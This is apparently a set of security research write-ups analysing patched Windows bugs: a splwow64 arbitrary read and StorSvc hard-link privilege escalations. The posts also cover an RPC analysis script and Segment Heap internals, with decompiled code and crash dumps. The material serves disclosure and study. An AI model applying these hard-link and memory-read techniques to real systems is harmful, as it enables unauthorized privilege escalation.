  if ( !v31 )
    goto LABEL_137;
  v33 = FindPrinterHandle(v31, *(_DWORD *)(v6 + 32), *(_DWORD *)(v6 + 36));
  ...
  [vulnerability code]
CVE-2021-1648: arbitrary address read
Let's talk about the information disclosure first. CVE-2021-1648 includes an arbitrary address read.
if ( v51 != -1 )
{
  v57 = **(unsigned __int16 ***)(v6 + 0x50); //not check v57
  if ( v57 )
  {
    v58 = v57[34];
    v59 = v58 + v57[35];
    if ( (unsigned int)v59 >= v58 && (unsigned int)v59 <= 0x1FFFE )
      memcpy_0(*(void **)(v6 + 88), v57, v59); //arbitrary address read
  }
}
The code for command 0x6D is too long to post in full. In short, it checks whether the destination address of the memcpy, taken from |v6+0x58|, is in the "valid" range, but the source address |v57| is not checked, so we can read from an arbitrary address.
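A minimal sketch of what a symmetric check would look like: both the destination and the source have to fall inside the shared view before the copy is allowed. The helper names and the view parameters are hypothetical; this is not the code Microsoft shipped.

```c
#include <stdint.h>
#include <stdbool.h>

/* True when [ptr, ptr + len) lies entirely inside [base, base + size). */
static bool range_in_view(uint64_t base, uint64_t size, uint64_t ptr,
                          uint64_t len)
{
    if (ptr < base)
        return false;
    uint64_t off = ptr - base;
    /* Written this way so that off + len cannot overflow. */
    return off <= size && len <= size - off;
}

/* A copy is acceptable only if BOTH ends are inside the view. */
static bool copy_allowed(uint64_t base, uint64_t size, uint64_t dst,
                         uint64_t src, uint64_t len)
{
    return range_in_view(base, size, dst, len) &&
           range_in_view(base, size, src, len);
}
```

In the vulnerable path only the first half of this condition exists, so a source such as 0x4141414141414141 passes straight through to memcpy.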
0:007> r
rax=0000000000868a00 rbx=000000000001fffe rcx=0000000000000000
rdx=4141414141414141 rsi=0000000000150200 rdi=00000000008688d0
rip=00007ff9fc008403 rsp=000000000210f480 rbp=000000000210f4f9
r8=100297f000000002 r9=000000000022f000 r10=00000fff3c9c801d
r11=000000000210f350 r12=0000000000868920 r13=0000000000868910
r14=0000000000000001 r15=0000000000461c50
iopl=0 nv up ei pl nz na po nc
cs=0033 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010206
gdi32full!GdiPrinterThunk+0x1a73:
00007ff9fc008403 0fb74a44 movzx ecx,word ptr [rdx+44h] ds:4141414141414185=????
Stack trace:
0:007> k
Child-SP RetAddr Call Site
000000000210f480 00007ff7558e78ab gdi32full!GdiPrinterThunk+0x1a73
000000000210f560 00007ff7558e84de splwow64+0x78ab
000000000210f650 00007ff7558e9f28 splwow64+0x84de
000000000210f6b0 00007ff9fe3f2e93 splwow64+0x9f28
000000000210f6e0 00007ff9fe3f45b4 ntdll!RtlDeleteCriticalSection+0x363
000000000210f730 00007ff9fc487bd4 ntdll!RtlInitializeResource+0xce4
000000000210faf0 00007ff9fe42ce51 KERNEL32!BaseThreadInitThunk+0x14
000000000210fb20 0000000000000000 ntdll!RtlUserThreadStart+0x21
Another two cases of CVE-2021-1648
The other two cases I reported to MSRC bypass the offset check functions "UMPDStringPointerFromOffset" and "UMPDPointerFromOffset". I think MSRC made a mistake in the range check of these two functions.
Splwow64 is a special service that provides x86 compatibility on x86-64 Windows, so the heaps it allocates always sit in the 32-bit address range. In the CVE-2020-0986 patch, however, "UMPDStringPointerFromOffset" and "UMPDPointerFromOffset" only check that the offset, and the offset plus the size, do not exceed 0x7fffffff.
signed __int64 __fastcall UMPDPointerFromOffset(unsigned __int64 *a1, __int64 a2, unsigned int a3)
{
  [...]
  if ( v3 <= 0x7FFFFFFF && v3 + a3 <= 0x7FFFFFFF )
  {
    *a1 = v3 + a2;
    return 1i64;
  }
  [...]
}
signed __int64 __fastcall UMPDStringPointerFromOffset(unsigned __int64 *a1, __int64 a2)
{
  [...]
  if ( v3 > 0x7FFFFFFF )
    goto LABEL_12;
  v4 = (0x7FFFFFFF - v3) >> 1;
  *a1 = v3 + a2;
  v5 = (unsigned int)v4;
  if ( v3 + a2 )
    v2 = wcsnlen((const wchar_t *)(v3 + a2), (unsigned int)v4);
  [...]
  return result;
}
But in the splwow64 service, many heaps, and even the stack, are allocated at low addresses, like this:
0:004> pc
splwow64!TLPCMgr::ProcessRequest+0x99:
00007ff6`846d7c71 e826490000 call splwow64!operator new[] (00007ff6`846dc59c)
0:004> p
splwow64!TLPCMgr::ProcessRequest+0x9e:
00007ff6`846d7c76 488bf0 mov rsi,rax
0:004> r rax
rax=00000000007d7c70
0:004> r rsp
rsp=000000000217f400
So it is possible to exploit this by reaching important heap or stack memory in the splwow64 service. In my report I suggested that MSRC check whether the pointer falls inside the portview section instead of comparing against 0x7fffffff.
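The gap between the two approaches can be sketched as follows. The first function mirrors the shape of the patched check; the second is the kind of check I suggested, bounded by the size of the portview. Both names and the `view_size` parameter are hypothetical.

```c
#include <stdint.h>
#include <stdbool.h>

/* Shape of the patched check: any offset below 2 GB is accepted. */
static bool weak_offset_check(uint64_t offset, uint32_t len)
{
    return offset <= 0x7FFFFFFF && offset + len <= 0x7FFFFFFF;
}

/* Suggested check: the offset and length must stay inside the view itself. */
static bool view_offset_check(uint64_t offset, uint32_t len,
                              uint64_t view_size)
{
    return offset <= view_size && len <= view_size - offset;
}
```

For a view of 0x20000 bytes, an offset of 0x10000000 passes the weak check even though it lands far outside the view, possibly on a heap or stack address of the service.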
Crash dumps for the two cases:
0:006> r
rax=0000000000000000 rbx=00000000012f8360 rcx=000000001363d9e0
rdx=00000000012f8360 rsi=0000000002d60200 rdi=000000001363d9d8
rip=00007fff728956d2 rsp=0000000002cdf230 rbp=0000000000000001
r8=0000000000000028 r9=0000000012345678 r10=000000007fffffff
r11=2222222222222222 r12=00007fff57ea8fe0 r13=0000000001208210
r14=000000000120aa50 r15=00007fff72860000
iopl=0 nv up ei pl nz na po nc
cs=0033 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010206
gdi32full!UMPDStringPointerFromOffset+0x12:
00007fff728956d2 4c8b09 mov r9,qword ptr [rcx] ds:000000001363d9e0=????????????????
0:006> r
rax=0000000000000001 rbx=0000000001628360 rcx=0000000042a3c4a1
rdx=0000000001628360 rsi=0000000000ff0200 rdi=0000000000000000
rip=00007fff7289568a rsp=0000000002ecf3d8 rbp=0000000000000001
r8=0000000000000028 r9=0000000041414141 r10=000000007fffffff
r11=2222222222222222 r12=00007fff57ea8fe0 r13=0000000001407160
r14=000000000140a000 r15=00007fff72860000
iopl=0 nv up ei pl nz na po nc
cs=0033 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010206
gdi32full!UMPDPointerFromOffset+0xa:
00007fff7289568a 4c8b09 mov r9,qword ptr [rcx] ds:0000000042a3c4a1=????????????????
The end of story
It seems Microsoft redesigned the splwow64 printer service, which is why they postponed the patch for four months. That is the longest I have waited for a patch since I started researching Windows. I hope the new printer service will be more secure :P.
Timeline
2020-07-27 Reported to MSRC.
2020-08-19 MSRC decided to put off patch.
2020-08-22 Bounty awarded
2021-01-13 Patch release
StorSvc writeup and introduction about my analysis script
Author: k0shl of Qihoo 360 Vulcan Team
Today I'd like to share two of my favorite logical escalation-of-privilege vulnerabilities, which I reported in 2019, CVE-2019-0983 and CVE-2019-0998, together with a short introduction to my RPC static analysis script. I have published both PoCs and the script on my GitHub. Both bugs were found by reversing; I actually don't know how to trigger them through normal user interaction and catch them with a monitor such as procmon. I will share more detail about how I found them in this post.
So let's begin our journey.
StorSvc overview
StorSvc is the Windows storage service, which provides services for storage settings and external storage. There were two interesting earlier findings in the Storage Service: CVE-2018-0983, reported by James Forshaw, and a blog post from SandboxEscaper (who has since deleted it). So I decided to look into this service.
Both James Forshaw's and SandboxEscaper's findings focused on the RPC interface storsvc!SvcMoveFileInheritSecurity, and Microsoft seems to have patched this logical vulnerability in "a simple way".
After Patch
signed __int64 SvcMoveFileInheritSecurity()
{
  return 0x80004001;
}
But this was not the only RPC interface in the service. After reversing StorSvc.dll, I found two interesting points.
StorSvc volume structure
Before I introduce my CVEs, I'd like to talk about an interesting structure I ran into while reversing.
Almost every RPC interface references this structure and checks it,
such as:
v6 = 0x450 * v5;
v7 = *(_DWORD *)(0x450 * v5 + g_StorageService[v3 + 5] + 564);
if ( !(v7 & 1) ....
LODWORD(v4) = StringCchCopyW(&FileName, 0x104ui64, (const wchar_t *)(v6 + g_StorageService[v3 + 5] + 4));
if ( (signed int)v4 >= 0 )
{
  .....
}
As the code shows, the variable v5 looks like an index into an array of structures of size 0x450, and g_StorageService is a global variable that stores these structures like a table. When I stepped into these RPC interfaces, the call always failed at the point where the service checks this structure.
0:002> dc poi(0x7ffe5b683bb0+0x28)+0x450 l4
00000169`44831820 00000000 00000000 00000000 00000000 ................
The content of this structure was always zero. That's bad, so I tried to find out why the check failed and how to set the value.
After some code review, I noticed that the content is set when an additional volume is mounted.
Now I knew why the value was always zero: I was testing in a VM that had only the original volume C:\. After a little research I found an easy way to make it work: add a new disk to the VM, such as E:. After that the structure is populated, and I could work out the meaning of some of its fields. For example, offset 0x4 holds the volume name, and offset 0x234 holds the volume state.
0:001> dc poi(0x7ffe5b683bb0+0x28)+0x450 l4 00000169`44831820 00000000 003a0045 0000005c 00000000 ....E.:.\.......
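The parts of the layout I could identify can be written down as a C struct. This is a hedged reconstruction: only the entry size (0x450), the name offset (0x4) and the state offset (0x234) come from the reversing above; the field names, the 0x104-character name length (taken from the StringCchCopyW bound) and the padding arrays are assumptions.

```c
#include <stddef.h>
#include <stdint.h>

/* Hypothetical reconstruction of one 0x450-byte volume entry. */
struct volume_entry {
    uint32_t unknown_000;           /* +0x000: not identified */
    uint16_t volume_name[0x104];    /* +0x004: UTF-16 name, e.g. "E:\" */
    uint8_t  unknown_20c[0x28];     /* +0x20C: not identified */
    uint32_t state;                 /* +0x234: volume state flags */
    uint8_t  unknown_238[0x218];    /* +0x238: not identified */
};

/* Compile-time checks that the sketch matches the observed offsets. */
_Static_assert(offsetof(struct volume_entry, volume_name) == 0x4, "name");
_Static_assert(offsetof(struct volume_entry, state) == 0x234, "state");
_Static_assert(sizeof(struct volume_entry) == 0x450, "entry size");

/* Index into the table the same way the service does (base + 0x450 * i). */
static struct volume_entry *entry_at(void *table, size_t index)
{
    return (struct volume_entry *)((uint8_t *)table +
                                   index * sizeof(struct volume_entry));
}
```

In the dump above, the entry at +0x450 (index 1) starts with a zero DWORD followed by the UTF-16 characters `E`, `:` and `\`, which matches a name field at offset 0x4.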
Now let me introduce CVE-2019-0983 and CVE-2019-0998.
(I used hard links in both CVEs, because Microsoft had not yet released the hard link mitigation at that time.)
CVE-2019-0983
The vulnerability is caused by a logical error in StorageService::ProvisionStorageCardForUser. The faulty code looks like this:
__int64 __fastcall StorageService::ProvisionStorageCardForUser(__int64 a1, int a2, unsigned int a3, wchar_t *a4)
{
  v22 = StringCchPrintfW(&ExistingFileName, 0x104ui64, L"%s\\desktop.ini");
  v9 = 0;
  if ( v22 >= 0 )
  {
    v23 = StringCchPrintfW(&NewFileName, 0x104ui64, L"%s\\desktop.ini", v21);
    v9 = 0;
    if ( v23 >= 0 )
    {
      CopyFileW(&ExistingFileName, &NewFileName, 0);
      v9 = 0;
    }
  }
}
CVE-2019-0983 is easy to understand. ExistingFileName was "C:\User\k0shl\Video\desktop.ini" and NewFileName was "E:\User\k0shl\Video\desktop.ini"; both files can be controlled by a normal user. So I can make the destination a hard link to a high-privilege file, and that file ends up overwritten with content I control.
After patch:
v15 = RpcImpersonateClient(0i64);
if ( v15 < 0 )
  goto LABEL_44;
v23 = (void **)&v39;
if ( v41 >= 8 )
  v23 = v39;
v24 = &v35;
if ( (unsigned __int64)Dst >= 8 )
  v24 = (struct _SECURITY_ATTRIBUTES **)v35;
if ( StringCchPrintfW(&ExistingFileName, 0x104ui64, L"%s\\desktop.ini", v24) >= 0
  && StringCchPrintfW(&NewFileName, 0x104ui64, L"%s\\desktop.ini", v23) >= 0 )
{
  CopyFileW(&ExistingFileName, &NewFileName, 0);
}
RpcRevertToSelf();
The patched code invokes RpcImpersonateClient() before CopyFileW().
CVE-2019-0998
The vulnerability is caused by a logical error in StorSvc!SvcSetStorageSettings. The faulty code is in the function StorageService::SetWriteAccess:
v14 = GetUserFolder(&pObjectName);
...
_wsplitpath_s(&pObjectName, 0i64, 0i64, 0i64, 0i64, &Filename, 0x104ui64, 0i64, 0i64);
LODWORD(phkResult) = StringCchCopyW(
  &PathName,
  0x104ui64,
  (const wchar_t *)(*(_QWORD *)(v7 + 8i64 * (_QWORD)v6 + 40) + 1104 * v11 + 4));
if ( (signed int)phkResult >= 0 )
{
  LODWORD(phkResult) = PathCchAppend(&PathName, 260i64, &Filename);
  if ( !CreateDirectoryW(&PathName, &SecurityAttributes) )
  {
    v17 = GetLastError();
    if ( v17 == 183 )
    {
      v18 = SetNamedSecurityInfoW(
        &PathName,
        SE_FILE_OBJECT,
        4u,
        0i64,
        0i64,
        *(PACL *)&SecurityAttributes.nLength,
        0i64);
First, the service invokes GetUserFolder() to get a full folder path and _wsplitpath_s() to split the full path down to its final component. For example, GetUserFolder() returns the full path "C:\User\k0shl", and after _wsplitpath_s() I get the Filename "k0shl".
Finally, PathName is set to "E:\k0shl" and CreateDirectoryW is invoked, because the service wants to create a user folder on the other volume. If creating the directory fails, the service reads the last error value; 0xb7 (183) means the path already exists. In that case the service invokes SetNamedSecurityInfoW to set its DACL, but it does not check whether PathName is a file or a directory. What if "E:\k0shl" is a file, not a directory? If I create a file instead of a directory on the volume and link it to a high-privilege file, the service ends up modifying the DACL of the high-privilege file.
After patch:
if ( CreateDirectoryW(&PathName, &SecurityAttributes) )
  goto LABEL_107;
v17 = GetLastError();
if ( v17 == 183 )
{
  if ( !(GetFileAttributesW(&PathName) & 0x10) )
  {
    LODWORD(phkResult) = -2147024891;
    goto LABEL_92;
  }
  v18 = SetNamedSecurityInfoW(
    &PathName,
    SE_FILE_OBJECT,
    4u,
    0i64,
    0i64,
    (PACL)SecurityAttributes.lpSecurityDescriptor,
    0i64);
After the patch, the service checks the file attributes to confirm that the path is a directory. I think there is still a TOCTOU here, but when I tested it the time window was too small: I couldn't delete the directory and create a symbolic link between GetFileAttributesW and SetNamedSecurityInfoW. I also can't use an oplock, because GetFileAttributesW() only queries file object information.
Introduction about my analysis script
After I reported these two logical vulnerabilities, I thought about how I had found them. First I located some sensitive functions, such as SetNamedSecurityInfo or CopyFile, and then I traced a code path to them from an RPC interface.
As I said in another blog post, I finally decided to write a script to help me analyze all RPC servers.
I sketched a simple framework for the script in my mind.
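The decision the patched code makes can be reduced to a small predicate. This is a sketch with hypothetical names; the three constants carry the same values as the Windows definitions ERROR_ALREADY_EXISTS, FILE_ATTRIBUTE_DIRECTORY and INVALID_FILE_ATTRIBUTES. The explicit handling of a failed attribute query is my own addition and is not visible in the decompiled patch.

```c
#include <stdint.h>
#include <stdbool.h>

#define ERR_ALREADY_EXISTS 183u          /* value of ERROR_ALREADY_EXISTS */
#define ATTR_DIRECTORY     0x10u         /* value of FILE_ATTRIBUTE_DIRECTORY */
#define ATTR_INVALID       0xFFFFFFFFu   /* value of INVALID_FILE_ATTRIBUTES */

/* Decide whether the DACL of an already existing path may be reset. */
static bool may_reset_dacl(uint32_t last_error, uint32_t attributes)
{
    if (last_error != ERR_ALREADY_EXISTS)
        return false;
    if (attributes == ATTR_INVALID)      /* my addition: query failed */
        return false;
    return (attributes & ATTR_DIRECTORY) != 0;
}
```

The predicate only describes the state at the moment of the query; the path can still change before the security call, which is the TOCTOU window mentioned above.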
- Step 1: I need to get all RPC server
- Step 2: I need to get all RPC interfaces
- Step 3: I need to parse RPC dll or exe in IDA
- Step 4: I need to find a code path from RPC interface to sensitive function
All of this was actually easy to complete. I use James Forshaw's awesome tool NtApiDotNet to parse RPC servers; it has a class named Win32 with an interesting method named ParsePeFile.
This function can parse an RPC server and export its RPC interfaces like RPCView does. I only need the RPC interface names.
public static IEnumerable<RpcServer> ParsePeFile(string file, string dbghelp_path, string symbol_path, bool parse_clients, bool ignore_symbols)
{
    List<RpcServer> servers = new List<RpcServer>();
    using (var result = SafeLoadLibraryHandle.LoadLibrary(file, LoadLibraryFlags.DontResolveDllReferences, false))
    {
        if (!result.IsSuccess)
        {
            return servers.AsReadOnly();
        }
        var lib = result.Result;
        var sections = lib.GetImageSections();
        var offsets = sections.SelectMany(s => FindRpcServerInterfaces(s, parse_clients));
        if (offsets.Any())
        {
            using (var sym_resolver = !ignore_symbols ? SymbolResolver.Create(NtProcess.Current, dbghelp_path, symbol_path) : null)
            {
                foreach (var offset in offsets)
                {
                    IMemoryReader reader = new CurrentProcessMemoryReader(sections.Select(s => Tuple.Create(s.Data.DangerousGetHandle().ToInt64(), (int)s.Data.ByteLength)));
                    NdrParser parser = new NdrParser(reader, NtProcess.Current, sym_resolver, NdrParserFlags.IgnoreUserMarshal);
                    IntPtr ifspec = lib.DangerousGetHandle() + (int)offset.Offset;
                    var rpc = parser.ReadFromRpcServerInterface(ifspec);
                    servers.Add(new RpcServer(rpc, parser.ComplexTypes, file, offset.Offset, offset.Client));
                }
            }
        }
    }
    return servers.AsReadOnly();
}
In IDA, I can use IDAPython to walk code paths through xrefs. I also found that the Python analysis script can run into path explosion, so I set the recursion depths to 10 and 7; if the function call count exceeds the recursion depth, the script returns a different result. Of course you can change these values. With that, I had collected everything I needed for the script.
In my script (for the script configuration, please check my GitHub):
- I go through all exe and dll files under C:\Windows\System32. (This does not cover all RPC servers; some live in other directories or have a suffix other than "dll" or "exe", such as Windows Defender or unimdm.tsp. You can configure the search path in my script.)
- I use Win32.RPC.ParsePeFile to parse every file; if it is an RPC server, the method returns IDL-like code
- I create a file that stores the sensitive functions and use an IDAPython script to parse the RPC dll or exe
- I collect all code paths to the sensitive functions, and if a path starts from an RPC interface that appears in the Win32.RPC.ParsePeFile result, I store it in SpecialFinal.txt
The result looks like:
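The depth-limited path search can be illustrated with a tiny call graph. This is a language-neutral sketch written in C rather than IDAPython, and it is not my script: the adjacency matrix, `MAX_FUNCS` and `path_exists` are hypothetical. It walks forward from a caller, while my script follows xrefs backward from the sensitive function, but the depth budget works the same way in both directions.

```c
#include <stdbool.h>

#define MAX_FUNCS 8

/* calls[a][b] is true when function a calls function b (hypothetical graph). */
static bool path_exists(bool calls[MAX_FUNCS][MAX_FUNCS], int from, int to,
                        int depth_left)
{
    if (from == to)
        return true;
    if (depth_left == 0)
        return false;            /* depth budget exhausted: give up */
    for (int next = 0; next < MAX_FUNCS; next++)
        if (calls[from][next] &&
            path_exists(calls, next, to, depth_left - 1))
            return true;
    return false;
}
```

The depth budget also guarantees termination when the call graph contains cycles, at the cost of missing paths that are longer than the budget.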
SvcSetStorageSettings[////////__imp_SetNamedSecurityInfoW<--?CreateStorageCardDirectory@StorageService@@IEAAJW4_STORAGE_DEVICE_TYPE@@KPEBGKPEAU_SECURITY_ATTRIBUTES@@PEAU_ACL@@H@Z<--?ProvisionStorageCardForUser@StorageService@@IEAAJW4_STORAGE_DEVICE_TYPE@@KPEAG1KPEAU_SECURITY_ATTRIBUTES@@PEAU_ACL@@@Z<--?SetWriteAccess@StorageService@@IEAAJW4_STORAGE_DEVICE_TYPE@@KK@Z<--?SetStorageSettings@StorageService@@QEAAJW4_STORAGE_DEVICE_TYPE@@KW4_STORAGE_SETTING@@K@Z<--SvcSetStorageSettings]
SvcSetStorageSettings[////////__imp_CopyFileW<--?ProvisionStorageCardForUser@StorageService@@IEAAJW4_STORAGE_DEVICE_TYPE@@KPEAG1KPEAU_SECURITY_ATTRIBUTES@@PEAU_ACL@@@Z<--?SetWriteAccess@StorageService@@IEAAJW4_STORAGE_DEVICE_TYPE@@KK@Z<--?SetStorageSettings@StorageService@@QEAAJW4_STORAGE_DEVICE_TYPE@@KW4_STORAGE_SETTING@@K@Z<--SvcSetStorageSettings]
Timeline
Feb 2019 : Vulnerabilities Reported
Feb 2019 : Microsoft reproduced
May 2019 : Patch released
May 2019 : Bounty awarded
https://portal.msrc.microsoft.com/en-us/security-guidance/advisory/CVE-2018-0983
https://portal.msrc.microsoft.com/en-us/security-guidance/advisory/CVE-2019-0983
https://portal.msrc.microsoft.com/en-us/security-guidance/advisory/CVE-2019-0998
https://github.com/k0keoyo/ksRPC_analysis_script
https://github.com/k0keoyo/my_vulnerabilities/tree/master/CVE-2019-0983
https://github.com/k0keoyo/my_vulnerabilities/tree/master/CVE-2019-0998
A Brief Analysis of Segment Heap and a WinDbg Extension
Author: k0shl of 360 Vulcan Team
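Overview
In Windows 10, Microsoft enabled a new heap management mechanism, the Segment Heap, which comes with its own Low Fragmentation Heap (LFH). Regular ring-3 application processes use the NT Heap, while specific processes, such as the system processes lsass.exe and svchost.exe, use the Segment Heap. For the NT Heap, see Angel Boy's post-WCTF talk "Windows 10 Nt Heap Exploitation"; for the Segment Heap, see Mark Yason's Black Hat 2016 talk "Windows 10 Segment Heap Internals".
Yason's talk already analyzes the Segment Heap in enough detail. The NT Heap and the Segment Heap differ considerably in structure. In this post I only give a brief analysis of how the Segment Heap logic is implemented in Windows ntdll, plus a short introduction to the WinDbg extension I wrote for the Segment Heap.
Creating a Segment Heap
Windows uses the Segment Heap in system processes, and some applications, such as Edge, use it as well. If you want to debug your own program, you can enable the Segment Heap by adding the corresponding registry value.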
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\(executable)
FrontEndHeapDebugOptions = (DWORD)0x08
The WinDbg !heap command shows the heap layout of the current process.
2: kd> !process 1f0 0
Searching for Process with Cid == 1f0
PROCESS ffffcf026f1cc0c0
SessionId: 0 Cid: 01f0 Peb: 1803b03000 ParentCid: 01e8
DirBase: 01850002 ObjectTable: ffffbd0dfbaea080 HandleCount: 574.
Image: csrss.exe
2: kd> .process /i /p ffffcf026f1cc0c0
You need to continue execution (press 'g' <enter>) for the context to be switched. When the debugger breaks in again, you will be in the new process context.
2: kd> g
0: kd> .reload /user
Loading User Symbols
....................
0: kd> !heap
Heap Address NT/Segment Heap
14bff720000 Segment Heap
7df42cce0000 NT Heap
The Segment Heap and the NT Heap are distinguished by the Signature member of the heap header. Signature is stored at heap header+0x10: when it is 0xDDEEDDEE the heap is a Segment Heap, and when it is 0xFFEEFFEE the heap is an NT Heap.
0: kd> dq 14bff720000 l3 //Segment Heap
0000014b`ff720000 00000000`01000000 00000000`00000000
0000014b`ff720010 00000000`ddeeddee
0: kd> dq 7df42cce0000 l3 //Nt Heap
00007df4`2cce0000 00000000`00000000 01009ba1`00f60fd8
00007df4`2cce0010 00000001`ffeeffee
When a process initializes, it calls RtlInitializeHeapManager to create the heap management structures. An inner function calls RtlpHpOptIntoSegmentHeap to decide whether to create a Segment Heap. RtlpHpOptIntoSegmentHeap checks things such as the process name; when the process is one of the designated system processes or a package, it sets the corresponding feature. Finally the Segment Heap is created and _SEGMENT_HEAP->Signature is set to 0xDDEEDDEE.
__int64 __fastcall RtlpHpOptIntoSegmentHeap(unsigned __int16 *a1)
{
  v1 = a1;
  v16 = L"svchost.exe"; //-----> designated system process
  v2 = 0;
  v17 = L"runtimebroker.exe"; //-----> designated system process
  v18 = L"csrss.exe"; //-----> designated system process
  v19 = L"smss.exe"; //-----> designated system process
  v20 = L"services.exe"; //-----> designated system process
  v21 = L"lsass.exe"; //-----> designated system process
  ...
}
//call path
LdrpInitializeProcess
|__RtlInitializeHeapManager
   |__RtlpHpOptIntoSegmentHeap
//finally, RtlpHpHeapCreate sets the Signature at +0x10 to 0xDDEEDDEE
__int64 __fastcall RtlpHpHeapCreate(unsigned __int32 a1, unsigned __int64 a2, __int64 a3, __m128i *a4)
{
  v9 = (__m128i *)RtlpHpHeapAllocate(v6, v7, (__m128i *)&v36);
  v9[1].m128i_i32[0] = 0xDDEEDDEE; //mov dword ptr [rax+10h], 0DDEEDDEEh
}
For this reason, in my Segment Heap WinDbg extension, after locating the Segment Heap header from the bucket block address being inspected, I check whether the Signature is 0xDDEEDDEE to confirm that the address is a valid bucket address.
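The signature test is simple enough to sketch directly. This is not the code of my extension: `classify_heap` and the enum are hypothetical, and the sketch reads from a local byte buffer instead of debugger memory. Only the +0x10 offset and the two signature values come from the analysis above.

```c
#include <stddef.h>
#include <stdint.h>
#include <string.h>

enum heap_kind { HEAP_UNKNOWN, HEAP_SEGMENT, HEAP_NT };

/* Classify a heap from a copy of the first bytes of its header. */
static enum heap_kind classify_heap(const uint8_t *header, size_t header_len)
{
    uint32_t sig;
    if (header_len < 0x14)
        return HEAP_UNKNOWN;               /* Signature not covered */
    memcpy(&sig, header + 0x10, sizeof sig);
    if (sig == 0xDDEEDDEEu)
        return HEAP_SEGMENT;
    if (sig == 0xFFEEFFEEu)
        return HEAP_NT;
    return HEAP_UNKNOWN;
}
```

Returning a third "unknown" value is useful in a debugger extension, because an address that is not a heap header at all should be rejected rather than treated as an NT Heap.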
Segment Heap LFHAllocate接下来对Segment Heap的分配和释放进行简单分析,首先我们需要了解_SEGMENT_HEAP中的一个关键结构_HEAP_LFH_CONTEXT,其成员在偏移0x340位置,在_HEAP_LFH_CONTEXT结构偏移0x80位置存放着一个Bucket Table,其结构关系如下。
0: kd> dt _SEGMENT_HEAP LfhContext ntdll!_SEGMENT_HEAP +0x340 LfhContext : _HEAP_LFH_CONTEXT 0: kd> dt _HEAP_LFH_CONTEXT Buckets ntdll!_HEAP_LFH_CONTEXT +0x080 Buckets : [129] Ptr64 _HEAP_LFH_BUCKET在BucketTable中存放不同Size的Bucket Manager pointer,其实LFH并非在最开始就处于待分配状态,在堆最开始分配的时候是通过正常的Variable Size分配,关于vs heap的分配可以参考Yason的slide,当进程申请堆时会调用ntdll!RtlAllocateHeap,在分配时会检查Signature是否是SegmentHeap。
__int64 __fastcall RtlAllocateHeap(_SEGMENT_HEAP *a1, unsigned int a2, __int64 a3) { if ( !a1 ) RtlpLogHeapFailure(19i64, 0i64); if ( a1->Signature == 0xDDEEDDEE ) return RtlpHpAllocWithExceptionProtection((__int64)a1, a3, a2); if ( RtlpHpHeapFeatures & 2 ) return RtlpHpTagAllocateHeap((__int64)a1, a3, a2); return RtlpAllocateHeapInternal(a1, a3, a2, 0i64); }若Signature值为0xDDEEDDEE时,会调用RtlpHpAllocWithExceptionProtection创建segment heap block,在最开始的时候,会检查Bucket Table中lfh是否已经激活,也就是第一比特是否为1,当第一比特为1时,当前Bucket处于未激活lfh的情况,会创建vs heap,我们暂不讨论vs heap的申请。
3: kd> dq 116abf90000+340+80 //Bucket Table
00000116`abf903c0 00000000`00000001 00000000`00000001
00000116`abf903d0 00000000`026e0001 00000116`abf90900 //pointer for an index whose LFH is activated
00000116`abf903e0 00000000`01ee0001 00000000`030f0001 //indexes that are not activated
00000116`abf903f0 00000000`04100001 00000000`00820001
00000116`abf90400 00000000`01280001 00000000`00e30001
00000116`abf90410 00000000`00210001 00000000`00410001
Segment Heap allocation is implemented in RtlpAllocateHeapInternal. The code is long but not complicated, so I only mark the parts of the logic that matter for this post. Interested readers can reverse the rest themselves.
__int64 __fastcall RtlpAllocateHeapInternal(_SEGMENT_HEAP *HeapBase, unsigned __int64 InSize, __int64 a3, __int64 a4)
{
  ……
  if ( InSize <= (unsigned int)WORD2(HeapBase->LfhContext.Buckets[0x13]) - 0x10 ) //--->(0)
  {
    if ( !(BucketTable[SizeIndex] & 1) ) { //--->(1)
      RtlpHpLfhSlotAllocate()
    }
    else if ( Allocate enough blocks ) { //--->(2)
      RtlpHpLfhBucketActivate()
    }
    else {
      do something //--->(3)
    }
  }
  if ( InSize > 0x20000 ) {
    RtlpHpLargeAlloc() //--->(4)
  }
  else {
    RtlpHpVsContextAllocateInternal() //--->(5)
  }
  ……
}
Below is a brief explanation of the logic in this code.
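(0) The allocator first checks whether the requested size is less than or equal to 0x4000-0x10, that is, 0x3ff0. If the size is greater than 0x3ff0 and less than or equal to 0x20000, it goes straight to the Variable Size heap allocator. If the size is greater than 0x20000, it uses the Large heap allocator.
(1) If the requested size is less than or equal to 0x3ff0, the allocator finds the index for that size in the Bucket Table and checks whether the LFH is already activated for it (whether the lowest bit of the entry is clear). If the LFH is activated, the if condition evaluates to TRUE and RtlpHpLfhSlotAllocate is called directly to allocate a Block.
(2) Otherwise, it checks whether the number of allocations already made for this size is enough to activate the LFH. If it is, RtlpHpLfhBucketActivate is called to activate the Bucket, and the matching Bucket Table entry is overwritten with a pointer.
(3) If the number of allocations is still not enough, some flags are set and execution leaves the if statement.
(4) When the requested size is greater than 0x20000, RtlpHpLargeAlloc is called to allocate from the Large heap.
(5) When the size check in (0) fails, or when the LFH activation condition is not met in (3), RtlpHpVsContextAllocateInternal is called to allocate from the VS heap. In other words, (5) is not limited to sizes greater than 0x3ff0 and less than or equal to 0x20000. Smaller sizes can also go through the VS heap, depending on how many Blocks have already been allocated.
We will not discuss the VS heap or the Large heap here, only the LFH. When the LFH is activated, RtlpHpLfhBucketActivate creates a Bucket Manager and stores the pointer to it in the Bucket Table slot for the matching Size Index. To study how Blocks are allocated, we have to start from this Bucket Manager.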
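The decision described in steps (0) to (5) can be condensed into a small C sketch. It is a simplified model, not the ntdll implementation: `alloc_path`, `choose_alloc_path` and the `enough_allocs` flag are hypothetical names, and the model only reports which path would be taken. What happens immediately after RtlpHpLfhBucketActivate returns is not shown in the pseudocode above, so the sketch reports activation as its own outcome.

```c
#include <assert.h>
#include <stdbool.h>
#include <stdint.h>

/* Hypothetical labels for the paths marked (1), (2), (4) and (5) above. */
typedef enum { PATH_LFH, PATH_LFH_ACTIVATE, PATH_VS, PATH_LARGE } alloc_path;

#define LFH_MAX_SIZE 0x3FF0u    /* 0x4000 - 0x10, from step (0) */
#define VS_MAX_SIZE  0x20000u   /* above this, the Large path is used */

/* bucket_entry is the raw Bucket Table slot for the size index:
 * a pointer (low bit clear) once the LFH is active, otherwise a
 * value with the low bit set. enough_allocs stands in for the
 * "enough blocks allocated" test of step (2). */
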